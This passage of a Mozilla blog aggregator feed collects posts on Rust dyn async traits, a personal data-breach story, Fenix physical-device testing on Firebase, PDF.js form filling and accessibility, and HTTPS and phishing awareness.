    fn next<'me>(&'me mut self) -> Pin<Box<dyn Future<Output = Option<Self::Item>> + 'me>> {
        // This code allocates a box for the result
        // and coerces into a dyn:
        Box::pin(AsyncIter::next(self))
    }
}

And finally we can implement the AsyncIter trait for the dynamic type:

impl<'data, Item> AsyncIter for DynAsyncIter<'data, Item> {
    type Item = Item;

    type Next<'me>
    where
        Item: 'me,
        'data: 'me,
    = Pin<Box<dyn Future<Output = Option<Item>> + 'me>>;

    fn next(&mut self) -> Self::Next<'_> {
        self.pointer.next()
    }
}

Yay, it all works, and without any unsafe code!

What I’d like to see

This “convert to dyn” approach isn’t really specific to async (as erased-serde shows). I’d like to see a decorator that applies it to any trait. I imagine something like:

// Generates the `DynAsyncIter` type shown above:
#[derive_dyn(DynAsyncIter)]
trait AsyncIter {
    type Item;
    async fn next(&mut self) -> Option<Self::Item>;
}

But this ought to work with any -> impl Trait return type, too, so long as Trait is dyn safe and implemented for Box<T>. So something like this:

// Generates the `DynAsyncIter` type shown above:
#[derive_dyn(DynSillyIterTools)]
trait SillyIterTools: Iterator {
    // Iterate over the iter in pairs of two items.
    fn pair_up(&mut self) -> impl Iterator<(Self::Item, Self::Item)>;
}

would generate an erased trait that returns a Box<dyn Iterator<(...)>>. Similarly, you could do a trick with taking any impl Foo and passing in a Box<dyn Foo>, so you can support impl Trait in argument position.

Even without impl trait, derive_dyn would create a more ergonomic dyn to play with.

I don’t really see this as a “long term solution”, but I would be interested to play with it.

Comments?

I’ve created a thread on internals if you’d like to comment on this post, or others in this series.

The Mozilla BlogHacked! Unravelling a data breach

This is a story about paying a steep price for a pair of cheap socks.

The first loose thread in June

One Tuesday morning as I* was having my coffee and toast before kicking off the work day, I got a text from my credit card company alerting me to a suspected fraud charge. Of course I was alarmed and started looking into it right away. 

I messaged my husband: Are you getting any fraud charge alerts? Nope, just me. 

Soon after, I received an email order confirmation (then another and another) for electronic goods I didn’t purchase. The email receipt showed my home billing address, with a different shipping address, which happened to be the location of a hotel in my city. I found it odd and scary that someone local had my credit card number matched to my actual name, home address and email address. I imagined them holed up in a hotel room opening boxes of stolen goods and reselling them on Craigslist. But wouldn’t the thief realize I (and other victims) would get these email messages? 

Wait. Was someone using my email account?! 

Hoping it wasn’t too late, I sprang into action, quickly changing my email password and verifying that my account wasn’t logged into any unfamiliar devices. Everything seemed okay there. I wondered if it could have been a mashup of data breaches and scrapes that allowed a thief to merge the information into a more complete picture. The thought crossed my mind that a keylogger was installed on my computer. 

Meanwhile, my credit card company canceled my cards and set about issuing new ones. What had actually happened didn’t pinpoint me personally — and here’s what I was able to weave together.

Backstitch to May

Like most people on Instagram, I love to see friends’ pics and scroll through other fun visual content. I don’t mind ads for movies and shows (hello entertaining videos that fill my playlist) or for clothes and accessories (hello virtual window shopping.) One ad kept reappearing for custom print socks. So cute. I caved and ordered a pair of these socks for my husband for Father’s Day, featuring our kids’ faces. They arrived, as adorable as could be, and we all had a good laugh when he opened them. 

Life went on. Then something else happened.

A tangled knot in July

Apparently the would-be credit card thief had also used FedEx for shipping, and when my credit card was declined, FedEx reverted to billing the shipper, which was the thief posing as me with my real address.

When I received the first invoice in the mail from FedEx, I called my credit card company who  assured me that the charge had been flagged as fraud. The representative advised me to ignore the letter, and that FedEx knew the charge wasn’t mine. But the second letter from FedEx was clear they weren’t giving up on collecting the fee billed to my “account” even though the real me doesn’t have one. 

When I called FedEx and gave the case number listed on the letter, the representative started asking what I felt were increasingly privacy-invading questions (wouldn’t the case number be enough information?), and I was worried this was a phishing expedition. Eventually, after a few more phone calls I was able to get this resolved. I think. No more letters. Fees removed. Still, it was unnerving.

Knitting the threads together in September

The email subject line caught my attention: Security Incident Notification. The e-commerce host for the adorable sock company I ordered from in May had been compromised. They wrote that:

The hosting company, by their own admission, forgot to enable one of the most basic security features, and this security oversight allowed our business to be attacked by an unknown 3rd party using a malicious file, allowing them to access some payment information.

The hosting company’s failure in ensuring traditional security and data-protection measures allowed the unknown 3rd-party to skim the information as it was entered.

So it appears the alarms that went off in June were related to a purchase I made in May. I can’t be sure that my data isn’t still out there, but at least my credit card has been replaced. I did check my credit report recently to make sure there wasn’t any suspicious activity.

The takeaway

I can only assume that the fraudsters had a huge dump of data, and they figured they could get away with theft from some people who wouldn’t even notice the charges. If the credit card hadn’t flagged the fraud, they might have gone unnoticed by someone who doesn’t review their monthly bill. It’s mildly inconvenient to have credit cards reissued, and it can also create problems with automatic bill-pays and urgent needs. Taking care of the fallout took time and effort. I’m assuming this is over, but maybe it’s not.

* * * * *

Truthfully, it could have been much worse. We can’t predict the future, but we can be prepared in case our personal information is ever part of a data breach. Luke Crouch, a cybersecurity expert with Mozilla, recommends people do the following when faced with a data breach:

  1. Lock down your email accounts by updating your passwords and setting up 2-factor authentication.
  2. Get a password manager.
  3. Use Firefox Monitor to see if your email has been part of any other breaches.

The bottom line: If you get snagged in a data breach, tie up any loose threads quickly to protect yourself, and stay on top of monitoring your accounts for suspicious activity.


*Ed note: This person’s name has been removed to protect their privacy.

At Mozilla, we work towards creating a safe and joyful Internet experience every day. That’s why this year for Cyber Security Awareness month, we’ll be featuring privacy and security experts as they weigh in on personal stories of cybercrime and more. Check back each week in October for a new story and expert advice on how to protect yourself online. In the meantime, kick start your own cyber security journey with products designed to keep you safe online including: Mozilla VPN to Firefox Monitor and Firefox Relay.


The post Hacked! Unravelling a data breach appeared first on The Mozilla Blog.

Niko MatsakisDyn async traits, part 5

If you’re willing to use nightly, you can already model async functions in traits by using GATs and impl Trait — this is what the Embassy async runtime does, and it’s also what the real-async-trait crate does. One shortcoming, though, is that your trait doesn’t support dynamic dispatch. In the previous posts of this series, I have been exploring some of the reasons for that limitation, and what kind of primitive capabilities need to be exposed in the language to overcome it. My thought was that we could try to stabilize those primitive capabilities with the plan of enabling experimentation. I am still in favor of this plan, but I realized something yesterday: using procedural macros, you can ALMOST do this experimentation today! Unfortunately, it doesn’t quite work owing to some relatively obscure rules in the Rust type system (perhaps some clever readers will find a workaround; that said, these are rules I have wanted to change for a while).

Just to be crystal clear: Nothing in this post is intended to describe an “ideal end state” for async functions in traits. I still want to get to the point where one can write async fn in a trait without any further annotation and have the trait be “fully capable” (support both static dispatch and dyn mode while adhering to the tenets of zero-cost abstractions1). But there are some significant questions there, and to find the best answers for those questions, we need to enable more exploration, which is the point of this post.

Code is on github

The code covered in this blog post has been prototyped and is available on github. See the caveat at the end of the post, though!

Design goal

To see what I mean, let’s return to my favorite trait, AsyncIter:

trait AsyncIter {
    type Item;
    async fn next(&mut self) -> Option<Self::Item>;
}

The post is going to lay out how we can transform a trait declaration like the one above into a series of declarations that achieve the following:

  • We can use it as a generic bound (fn foo<T: AsyncIter>()), in which case we get static dispatch, full auto trait support, and all the other goodies that normally come with generic bounds in Rust.
  • Given a T: AsyncIter, we can coerce it into some form of DynAsyncIter that uses virtual dispatch. In this case, the type doesn’t reveal the specific T or the specific types of the futures.
    • I wrote DynAsyncIter, and not dyn AsyncIter on purpose — we are going to create our own type that acts like a dyn type, but which manages the adaptations needed for async.
    • For simplicity, let’s assume we want to box the resulting futures. Part of the point of this design though is that it leaves room for us to generate whatever sort of wrapping types we want.

You could write the code I’m showing here by hand, but the better route would be to package it up as a kind of decorator (e.g., #[async_trait_v2]2).

The basics: trait with a GAT

The first step is to transform the trait to have a GAT and a regular fn, in the way that we’ve seen many times:

trait AsyncIter {
    type Item;

    type Next<me>: Future<Output = Option<Self::Item>>
    where
        Self: me;

    fn next(&mut self) -> Self::Next<_>;
}

Next: define a “DynAsyncIter” struct

The next step is to manage the virtual dispatch (dyn) version of the trait. To do this, we are going to “roll our own” object by creating a struct DynAsyncIter. This struct plays the role of a Box<dyn AsyncIter> trait object. Instances of the struct can be created by calling DynAsyncIter::from with some specific iterator type; the DynAsyncIter type implements the AsyncIter trait, so once you have one you can just call next as usual:

let the_iter: DynAsyncIter<u32> = DynAsyncIter::from(some_iterator);
process_items(&mut the_iter);

async fn sum_items(iter: &mut impl AsyncIter<Item = u32>) -> u32 {
    let mut s = 0;
    while let Some(v) = the_iter.next().await {
        s += v;
    }
    s
}

Struct definition

Let’s look at how this DynAsyncIter struct is defined. First, we are going to “roll our own” object by creating a struct DynAsyncIter. This struct is going to model a Box<dyn AsyncIter> trait object; it will have one generic parameter for every ordinary associated type declared in the trait (not including the GATs we introduced for async fn return types). The struct itself has two fields, the data pointer (a box, but in raw form) and a vtable. We don’t know the type of the underlying value, so we’ll use ErasedData for that:

type ErasedData = ();

pub struct DynAsyncIter<Item> {
    data: *mut ErasedData,
    vtable: &static DynAsyncIterVtable<Item>,
}

For the vtable, we will make a struct that contains a fn for each of the methods in the trait. Unlike the builtin vtables, we will modify the return type of these functions to be a boxed future:

struct DynAsyncIterVtable<Item> {
    drop_fn: unsafe fn(*mut ErasedData),
    next_fn: unsafe fn(&mut *mut ErasedData) -> Box<dyn Future<Output = Option<Item>> + _>,
}

Implementing the AsyncIter trait

Next, we can implement the AsyncIter trait for the DynAsyncIter type. For each of the new GATs we introduced, we simply use a boxed future type. For the method bodies, we extract the function pointer from the vtable and call it:

impl<Item> AsyncIter for DynAsyncIter<Item> {
    type Item = Item;

    type Next<me> = Box<dyn Future<Output = Option<Item>> + me>;

    fn next(&mut self) -> Self::Next<_> {
        let next_fn = self.vtable.next_fn;
        unsafe { next_fn(&mut self.data) }
   }
}

The unsafe keyword here is asserting that the safety conditions of next_fn are met. We’ll cover that in more detail later, but in short those conditions are:

  • The vtable corresponds to some erased type T: AsyncIter
  • …and each instance of *mut ErasedData points to a valid Box<T> for that type.

Dropping the object

Speaking of Drop, we do need to implement that as well. It too will call through the vtable:

impl Drop for DynAsyncIter {
    fn drop(&mut self) {
        let drop_fn = self.vtable.drop_fn;
        unsafe { drop_fn(self.data); }
    }
}

We need to call through the vtable because we don’t know what kind of data we have, so we can’t know how to drop it correctly.

Creating an instance of DynAsyncIter

To create one of these DynAsyncIter objects, we can implement the From trait. This allocates a box, coerces it into a raw pointer, and then combines that with the vtable:

impl<Item, T> From<T> for DynAsyncIter<Item>
where
    T: AsyncIter<Item = Item>,
{
    fn from(value: T) -> DynAsyncIter {
        let boxed_value = Box::new(value);
        DynAsyncIter {
            data: Box::into_raw(boxed_value) as *mut (),
            vtable: dyn_async_iter_vtable::<T>(), // we’ll cover this fn later
        }
    }
}

Creating the vtable shims

Now we come to the most interesting part: how do we create the vtable for one of these objects? Recall that our vtable was a struct like so:

struct DynAsyncIterVtable<Item> {
    drop_fn: unsafe fn(*mut ErasedData),
    next_fn: unsafe fn(&mut *mut ErasedData) -> Box<dyn Future<Output = Option<Item>> + _>,
}

We are going to need to create the values for each of those fields. In an ordinary dyn, these would be pointers directly to the methods from the impl, but for us they are “wrapper functions” around the core trait functions. The role of these wrappers is to introduce some minor coercions, such as allocating a box for the resulting future, as well as to adapt from the “erased data” to the true type:

// Safety conditions:
//
// The `*mut ErasedData` is actually the raw form of a `Box<T>` 
// that is valid for ‘a.
unsafe fn next_wrapper<a, T>(
    this: &a mut *mut ErasedData,
) -> Box<dyn Future<Output = Option<T::Item>> + a
where
    T: AsyncIter,
{
    let unerased_this: &mut Box<T> = unsafe { &mut *(this as *mut Box<T>) };
    let future: T::Next<_> = <T as AsyncIter>::next(unerased_this);
    Box::new(future)
}

We’ll also need a “drop” wrapper:

// Safety conditions:
//
// The `*mut ErasedData` is actually the raw form of a `Box<T>` 
// and this function is being given ownership of it.
fn drop_wrapper<T>(
    this: *mut ErasedData,
)
where
    T: AsyncIter,
{
    let unerased_this = Box::from_raw(this as *mut T);
    drop(unerased_this); // Execute destructor as normal
}

Constructing the vtable

Now that we’ve defined the wrappers, we can construct the vtable itself. Recall that the From impl called a function dyn_async_iter_vtable::<T>. That function looks like this:

fn dyn_async_iter_vtable<T>() -> &static DynAsyncIterVtable<T::Item>
where
    T: AsyncIter,
{
    const {
        &DynAsyncIterVtable {
            drop_fn: drop_wrapper::<T>,
            next_fn: next_wrapper::<T>,
        }
    }
}

This constructs a struct with the two function pointers: this struct only contains static data, so we are allowed to return a &’static reference to it.

Done!

And now the caveat, and a plea for help

Unfortunately, this setup doesn’t work quite how I described it. There are two problems:

  • const functions and expressions stil lhave a lot of limitations, especially around generics like T, and I couldn’t get them to work;
  • Because of the rules introduced by RFC 1214, the &’static DynAsyncIterVtable<T::Item> type requires that T::Item: 'static, which may not be true here. This condition perhaps shouldn’t be necessary, but the compiler currently enforces it.

I wound up hacking something terrible that erased the T::Item type into uses and used Box::leak to get a &'static reference, just to prove out the concept. I’m almost embarassed to show the code, but there it is.

Anyway, I know people have done some pretty clever tricks, so I’d be curious to know if I’m missing something and there is a way to build this vtable on Rust today. Regardless, it seems like extending const and a few other things to support this case is a relatively light lift, if we wanted to do that.

Conclusion

This blog post presented a way to implement the dyn dispatch ideas I’ve been talking using only features that currently exist and are generally en route to stabilization. That’s exiting to me, because it means that we can start to do measurements and experimentation. For example, I would really like to know the performance impact of transitiong from async-trait to a scheme that uses a combination of static dispatch and boxed dynamic dispatch as described here. I would also like to explore whether there are other ways to wrap futures (e.g., with task-local allocators or other smart pointers) that might perform better. This would help inform what kind of capabilities we ultimately need.

Looking beyond async, I’m interested in tinkering with different models for dyn in general. As an obvious example, the “always boxed” version I implemented here has some runtime cost (an allocation!) and isn’t applicable in all environments, but it would be far more ergonomic. Trait objects would be Sized and would transparently work in far more contexts. We can also prototype different kinds of vtable adaptation.

  1. In the words of Bjarne Stroustroup, “What you don’t use, you don’t pay for. And further: What you do use, you couldn’t hand code any better.” 

  2. Egads, I need a snazzier name than that! 

Jan-Erik RedigerFenix Physical Device Testing

The Firefox for Android (Fenix) project runs extensive tests on every pull request and when merging code back into the main branch.

While many tests run within an isolated Java environment, Fenix also contains a multitude of UI tests. They allow testing the full application, interaction with the UI and other events. Running these requires the Android emulator running or a physical Android device connected. To run these tests in the CI environment the Fenix team relies on the Firebase test lab, a cloud-based testing service offering access to a range of physical and virtual devices to run Android applications on.

To speed up development, the automatically scheduled tests associated with a pull request are only run on virtual devices. These are quick to spin up, there is basically no upper limit of devices that can spawn on the cloud infrastructure and they usually produce the same result as running the test on a physical device.

But once in a while you encounter a bug that can only be reproduced reliably on a physical device. If you don't have access to such a device, what do you do? Or you know the bug happens on that one specific device type you don’t have?

You remember that the Firebase Test Lab offers physical devices as well and the Fenix repository is very well set up to run your test on these too if needed!

Here's how you change the CI configuration to do this.

NOTE: Do not land a Pull Request that switches CI from virtual to physical devices! Add the pr:do-not-land label and call out that the PR is only there for testing!

By default the Fenix CI runs tests using virtual devices on x86. That's faster when the host is also a x86(_64) system, but most physical devices use the Arm platform. So first we need to instruct it to run tests on Arm.

Which platform to test on is defined in taskcluster/ci/ui-test/kind.yml. Find the line where it downloads the target.apk produced in a previous step and change it from x86 to arm64-v8a:

  run:
      commands:
-         - [wget, {artifact-reference: '<signing/public/build/x86/target.apk>'}, '-O', app.apk]
+         - [wget, {artifact-reference: '<signing/public/build/arm64-v8a/target.apk>'}, '-O', app.apk]

Then look for the line where it invokes the ui-test.sh and tell it to use arm64-v8a again:

  run:
      commands:
-         - [automation/taskcluster/androidTest/ui-test.sh, x86, app.apk, android-test.apk, '-1']
+         - [automation/taskcluster/androidTest/ui-test.sh, arm64-v8a, app.apk, android-test.apk, '-1']

With the old CI configuration it will look for Firebase parameters in automation/taskcluster/androidTest/flank-x86.yml. Now that we switched the architecture it will pick up automation/taskcluster/androidTest/flank-arm64-v8a.yml instead.

In that file we can now pick the device we want to run on:

   device:
-   - model: Pixel2
+   - model: dreamlte
      version: 28

You can get a list of available devices by running gcloud locally:

gcloud firebase test android models list

The value from the MODEL_ID column is what you use for the model parameter in flank-arm64-v8a.yml. dreamlte translates to a Samsung Galaxy S8, which is available on Android API version 28.

If you only want to run a subset of tests define the test-targets:

test-targets:
 - class org.mozilla.fenix.glean.BaselinePingTest

Specify an exact test class as above to run tests from just that class.

And that's all the configuration necessary. Save your changes, commit them, then push up your code and create a pull request. Once the decision task on your PR finishes you will find a ui-test-x86-debug job (yes, x86, we didn't rename the job). Its log file will have details on the test run and contain links to the test run summary. Follow them to get more details, including the logcat output and a video of the test run.


This explanation will eventually move into documentation for Mozilla's Android projects.
Thanks to Richard Pappalardo & Aaron Train for the help figuring out how to run tests on physical devices and early feedback on the post. Thanks to Will Lachance for feedback and corrections. Any further errors are mine alone.

Mozilla Attack & DefenseImplementing form filling and accessibility in the Firefox PDF viewer

Intro

Last year, during lockdown, many discovered the importance of PDF forms when having to deal remotely with administrations and large organizations like banks. Firefox supported displaying PDF forms, but it didn’t support filling them: users had to print them, fill them by hand, and scan them back to digital form. We decided it was time to reinvest in the PDF viewer (PDF.js) and support filling PDF forms within Firefox to make our users’ lives easier.

While we invested more time in the PDF viewer, we also went through the backlog of work and prioritized improving the accessibility of our PDF reader for users of assistive technologies. Below we’ll describe how we implemented the form support, improved accessibility, and made sure we had no regressions along the way.

Brief Summary of the PDF.js Architecture

Overview of the PDF.js Architecture
To understand how we added support for forms and tagged PDFs, it’s first important to understand some basics about how the PDF viewer (PDF.js) works in Firefox.

First, PDF.js will fetch and parse the document in a web worker. The parsed document will then generate drawing instructions. PDF.js sends them to the main thread and draws them on an HTML5 canvas element.

Besides the canvas, PDF.js potentially creates three more layers that are displayed on top of it. The first layer, the text layer, enables text selection and search. It contains span elements that are transparent and line up with the text drawn below them on the canvas. The other two layers are the Annotation/AcroForm layer and the XFA form layer. They support form filling and we will describe them in more detail below.

Filling Forms (AcroForms)

AcroForms are one of two types of forms that PDF supports, the most common type of form.

AcroForm structure

Within a PDF file, the form elements are stored in the annotation data. Annotations in PDF are separate elements from the main content of a document. They are often used for things like taking notes on a document or drawing on top of a document. AcroForm annotation elements support user input similar to HTML input e.g. text, check boxes, radio buttons.

AcroForm implementation

In PDF.js, we parse a PDF file and create the annotations in a web worker. Then, we send them out from the worker and render them in the main process using HTML elements inserted in a div (annotation layer). We render this annotation layer, composed of HTML elements, on top of the canvas layer.

The annotation layer works well for displaying the form elements in the browser, but it was not compatible with the way PDF.js supports printing. When printing a PDF, we draw its contents on a special printing canvas, insert it into the current document and send it to the printer. To support printing form elements with user input, we needed to draw them on the canvas.

By inspecting (with the help of the qpdf tool) the raw PDF data of forms saved using other tools, we discovered that we needed to save the appearance of a filled field by using some PDF drawing instructions, and that we could support both saving and printing with a common implementation.

To generate the field appearance, we needed to get the values entered by the user. We introduced an object called annotationStorage to store those values by using callback functions in the corresponding HTML elements. The annotationStorage is then passed to the worker when saving or printing, and the values for each annotation are used to create an appearance.

Example PDF.js Form Rendering

On top a filled form in Firefox and on bottom the printed PDF opened in Evince.

Safely Executing JavaScript within PDFs

Thanks to our Telemetry, we discovered that many forms contain and use embedded JavaScript code (yes, that’s a thing!).

JavaScript in PDFs can be used for many things, but is most commonly used to validate data entered by the user or automatically calculate formulas. For example, in this PDF, tax calculations are performed automatically starting from user input. Since this feature is common and helpful to users, we set out to implement it in PDF.js.

The alternatives

From the start of our JavaScript implementation, our main concern was security. We did not want PDF files to become a new vector for attacks. Embedded JS code must be executed when a PDF is loaded or on events generated by form elements (focus, input, …).

We investigated using the following:

  1. JS eval function
  2. JS engine compiled in WebAssembly with emscripten
  3. Firefox JS engine ComponentUtils.Sandbox

The first option, while simple, was immediately discarded since running untrusted code in eval is very unsafe.

Option two, using a JS engine compiled with WebAssembly, was a strong contender since it would work with the built-in Firefox PDF viewer and the version of PDF.js that can be used in regular websites. However, it would have been a large new attack surface to audit. It would have also considerably increased the size of PDF.js and it would have been slower.

The third option, sandboxes, is a feature exposed to privileged code in Firefox that allows JS execution in a special isolated environment. The sandbox is created with a null principal, which means that everything within the sandbox can only be accessed by it and can only access other things within the sandbox itself (and by privileged Firefox code).

Our final choice

We settled on using a ComponentUtils.Sandbox for the Firefox built-in viewer. ComponentUtils.Sandbox has been used for years now in WebExtensions, so this implementation is battle tested and very safe: executing a script from a PDF is at least as safe as executing one from a normal web page.

For the generic web viewer (where we can only use standard web APIs, so we know nothing about ComponentUtils.Sandbox) and the pdf.js test suite we used a WebAssembly version of QuickJS (see pdf.js.quickjs for details).

The implementation of the PDF sandbox in Firefox works as follows:

  • We collect all the fields and their properties (including the JS actions associated with them) and then clone them into the sandbox;
  • At build time, we generate a bundle with the JS code to implement the PDF JS API (totally different from the web API we are accustomed to!). We load it in the sandbox and then execute it with the data collected during the first step;
  • In the HTML representation of the fields we added callbacks to handle the events (focus, input, …). The callbacks simply dispatch them into the sandbox through an object containing the field identifier and linked parameters. We execute the corresponding JS actions in the sandbox using eval (it’s safe in this case: we’re in a sandbox). Then, we clone the result and dispatch it outside the sandbox to update the states in the HTML representations of the fields.

We decided not to implement the PDF APIs related to I/O (network, disk, …) to avoid any security concerns.

Yet Another Form Format: XFA

Our Telemetry also informed us that another type of PDF forms, XFA, was fairly common. This format has been removed from the official PDF specification, but many PDFs with XFA still exist and are viewed by our users so we decided to implement it as well.

The XFA format

The XFA format is very different from what is usually in PDF files. A normal PDF is typically a list of drawing commands with all layout statically defined by the PDF generator. However, XFA is much closer to HTML and has a more dynamic layout that the PDF viewer must generate. In reality XFA is a totally different format that was bolted on to PDF.

The XFA entry in a PDF contains multiple XML streams: the most important being the template and datasets. The template XML contains all the information required to render the form: it contains the UI elements (e.g. text fields, checkboxes, …) and containers (subform, draw, …) which can have static or dynamic layouts. The datasets XML contains all the data used by the form itself (e.g. text field content, checkbox state, …). All these data are bound into the template (before layout) to set the values of the different UI elements.

Example Template
<template xmlns="http://www.xfa.org/schema/xfa-template/3.6/">
  <subform>
    <pageSet name="ps">
      <pageArea name="page1" id="Page1">
        <contentArea x="7.62mm" y="30.48mm" w="200.66mm" h="226.06mm"/>
        <medium stock="default" short="215.9mm" long="279.4mm"/>
      </pageArea>
    </pageSet>
    <subform>
      <draw name="Text1" y="10mm" x="50mm" w="200mm" h="7mm">
        <font size="15pt" typeface="Helvetica"/>
        <value>
          <text>Hello XFA & PDF.js world !</text>
        </value>
      </ draw>
    </subform>
  </subform>
</template>
Output From Template

Rendering of XFA Document

The XFA implementation

In PDF.js we already had a pretty good XML parser to retrieve metadata about PDFs: it was a good start.

We decided to map every XML node to a JavaScript object, whose structure is used to validate the node (e.g. possible children and their different numbers). Once the XML is parsed and validated, the form data needs to be bound in the form template and some prototypes can be used with the help of SOM expressions (kind of XPath expressions).

The layout engine

In XFA, we can have different kinds of layouts and the final layout depends on the contents. We initially planned to piggyback on the Firefox layout engine, but we discovered that unfortunately we would need to lay everything out ourselves because XFA uses some layout features which don’t exist in Firefox. For example, when a container is overflowing the extra contents can be put in another container (often on a new page, but sometimes also in another subform). Moreover, some template elements don’t have any dimensions, which must be inferred based on their contents.

In the end we implemented a custom layout engine: we traverse the template tree from top to bottom and, following layout rules, check if an element fits into the available space. If it doesn’t, we flush all the elements layed out so far into the current content area, and we move to the next one.

During layout, we convert all the XML elements into JavaScript objects with a tree structure. Then, we send them to the main process to be converted into HTML elements and placed in the XFA layer.

The missing font problem

As mentioned above, the dimensions of some elements are not specified. We must compute them ourselves based on the font used in them. This is even more challenging because sometimes fonts are not embedded in the PDF file.

Not embedding fonts in a PDF is considered bad practice, but in reality many PDFs do not include some well-known fonts (e.g. the ones shipped by Acrobat or Windows: Arial, Calibri, …) as PDF creators simply expected them to be always available.

To have our output more closely match Adobe Acrobat, we decided to ship the Liberation fonts and glyph widths of well-known fonts. We used the widths to rescale the glyph drawing to have compatible font substitutions for all the well-known fonts.

Comparing glyph rescaling

On the left: default font without glyph rescaling. On the right: Liberation font with glyph rescaling to emulate MyriadPro.

The result

In the end the result turned out quite good, for example, you can now open PDFs such as 5704 – APPLICATION FOR A FISH EXPORT LICENCE in Firefox 93!

Making PDFs accessible

What is a Tagged PDF?

Early versions of PDFs were not a friendly format for accessibility tools such as screen readers. This was mainly because within a document, all text on a page is more or less absolutely positioned and there’s not a notion of a logical structure such as paragraphs, headings or sentences. There was also no way to provide a text description of images or figures. For example, some pseudo code for how a PDF may draw text:

showText(“This”, 0 /*x*/, 60 /*y*/);
showText(“is”, 0, 40);
showText(“a”, 0, 20);
showText(“Heading!”, 0, 0);

This would draw text as four separate lines, but a screen reader would have no idea that they were all part of one heading. To help with accessibility, later versions of the PDF specification introduced “Tagged PDF.” This allowed PDFs to create a logical structure that screen readers could then use. One can think of this as a similar concept to an HTML hierarchy of DOM nodes. Using the example above, one could add tags:

beginTag(“heading 1”);
showText(“This”, 0 /*x*/, 60 /*y*/);
showText(“is”, 0, 40);
showText(“a”, 0, 20);
showText(“Heading!”, 0, 0);
endTag(“heading 1”);

With the extra tag information, a screen reader knows that all of the lines are part of “heading 1” and can read it in a more natural fashion. The structure also allows screen readers to easily navigate to different parts of the document.

The above example is only about text, but tagged PDFs support many more features than this e.g. alt text for images, table data, lists, etc.

How we supported Tagged PDFs in PDF.js

For tagged PDFs we leveraged the existing “text layer” and the browsers built in HTML ARIA accessibility features. We can easily see this by a simple PDF example with one heading and one paragraph. First, we generate the logical structure and insert it into the canvas:

<canvas id="page1">
  <!-- This content is not visible, 
  but available to screen readers   -->
  <span role="heading" aria-level="1" aria-owns="heading_id"></span>
  <span aria_owns="some_paragraph"></span>
</canvas>

In the text layer that overlays the canvas:

<div id="text_layer">
  <span id="heading_id">Some Heading</span>
  <span id="some_paragaph">Hello world!</span>
</div>

A screen reader would then walk the DOM accessibility tree in the canvas and use the `aria-owns` attributes to find the text content for each node. For the above example, a screen reader would announce:

Heading Level 1 Some Heading
Hello World!

For those not familiar with screen readers, having this extra structure also makes navigating around the PDF much easier: you can jump from heading to heading and read paragraphs without unneeded pauses.

Ensure there are no regressions at scale, meet reftests

Reference Test Analyzer

Crawling for PDFs

Over the past few months, we have built a web crawler to retrieve PDFs from the web and, using a set of heuristics, collect statistics about them (e.g. are they XFA? What fonts are they using? What formats of images do they include?).

We have also used the crawler with its heuristics to retrieve PDFs of interest from the “stressful PDF corpus” published by the PDF association, which proved particularly interesting as they contained many corner cases we did not think could exist.

With the crawler, we were able to build a large corpus of Tagged PDFs (around 32000), PDFs using JS (around 1900), XFA PDFs (around 1200) which we could use for manual and automated testing. Kudos to our QA team for going through so many PDFs! They now know everything about asking for a fishing license in Canada, life skills!

Reftests for the win

We did not only use the corpus for manual QA, but also added some of those PDFs to our list of reftests (reference tests).

A reftest is a test consisting of a test file and a reference file. The test file uses the pdf.js rendering engine, while the reference file doesn’t (to make sure it is consistent and can’t be affected by changes in the patch the test is validating). The reference file is simply a screenshot of the rendering of a given PDF from the “master” branch of pdf.js.

The reftest process

When a developer submits a change to the PDF.js repo, we run the reftests and ensure the rendering of the test file is exactly the same as the reference screenshot. If there are differences, we ensure that the differences are improvements rather than regressions.

After accepting and merging a change, we regenerate the references.

The reftest shortcomings

In some situations a test may have subtle differences in rendering compared to the reference due to, e.g., anti-aliasing. This introduces noise in the results, with “fake” regressions the developer and reviewer have to sift through. Sometimes, it is possible to miss real regressions because of the large number of differences to look at.

Another shortcoming of reftests is that they are often big. A regression in a reftest is not as easy to investigate as a failure of a unit test.

Despite these shortcomings, reftests are a very powerful regression prevention weapon in the pdf.js arsenal. The large number of reftests we have boosts our confidence when applying changes.

Conclusion

Support for AcroForms landed in Firefox v84. JavaScript execution in v88. Tagged PDFs in v89. XFA forms in v93 (tomorrow, October 5th, 2021!).

While all of these features have greatly improved form usability and accessibility, there are still more features we’d like to add. If you’re interested in helping, we’re always looking for more contributors and you can join us on element or github.

The Mozilla BlogHTTPS and your online security

We have long advised Web users to look for HTTPS and the lock icon in the address bar of their favorite browser (Firefox!) before typing passwords or other private information into a website. These are solid tips, but it’s worth digging deeper into what HTTPS does and doesn’t do to protect your online security and what steps you need to take to be safer.

Trust is more than encryption

It’s true that looking for the lock icon and HTTPS will help you prevent attackers from seeing any information you submit to a website. HTTPS also prevents your internet service provider (ISP) from seeing what pages you visit beyond the top level of a website. That means they can see that you regularly visit https://www.reddit.com, for example, but they won’t see that you spend most of your time at https://www.reddit.com/r/CatGifs/. But while HTTPS does guarantee that your communication is private and encrypted, it doesn’t guarantee that the site won’t try to scam you.

Because here’s the thing: Any website can use HTTPS and encryption. This includes the good, trusted websites as well as the ones that are up to no good — the scammers, the phishers, the malware makers.

You might be scratching your head right now, wondering how a nefarious website can use HTTPS. You’ll be forgiven if you wonder in all caps HOW CAN THIS BE?

The answer is that the security of your connection to a website — which HTTPS provides — knows nothing about the information being relayed or the motivations of the entities relaying it. It’s a lot like having a phone. The phone company isn’t responsible for scammers calling you and trying to get your credit card. You have to be savvy about who you’re talking to. The job of HTTPS is to provide a secure line, not guarantee that you won’t be talking to crooks on it.

That’s your job. Tough love, I know. But think about it. Scammers go to great lengths to trick you, and their motives largely boil down to one: to separate you from your money. This applies everywhere in life, online and offline. Your job is to not get scammed.

How do you spot a scam website?

Consider the uniform. It generally evokes authority and trust. If a legit looking person in a spiffy uniform standing outside of your bank says she works for the bank and offers to take your cash in and deposit it, would you trust her? Of course not. You’d go directly to the bank yourself. Apply that same skepticism online.

Since scammers go to great lengths to trick you, you can expect them to appear in a virtual uniform to convince you to trust them. “Phishing” is a form of identity theft that occurs when a malicious website impersonates a legitimate one in order to trick you into giving up sensitive information such as passwords, account details or credit card numbers. Phishing attacks usually come from email messages that attempt to lure you, the recipient, into updating your personal information on fake but very real-looking websites. Those websites may also use HTTPS in an attempt to boost their legitimacy in your eyes.

Here are some things you should do.

Don’t click suspicious links.

I once received a message telling me that my Bank of America account had been frozen, and I needed to click through to fix it. It looked authentic, however, I don’t have a BoFA account. That’s what phishing is — casting a line to bait someone. If I did have a BoFA account, I may have clicked through and been hooked. A safer approach would be to go directly to the Bank of America website, or give them a call to find out if the email was fake.

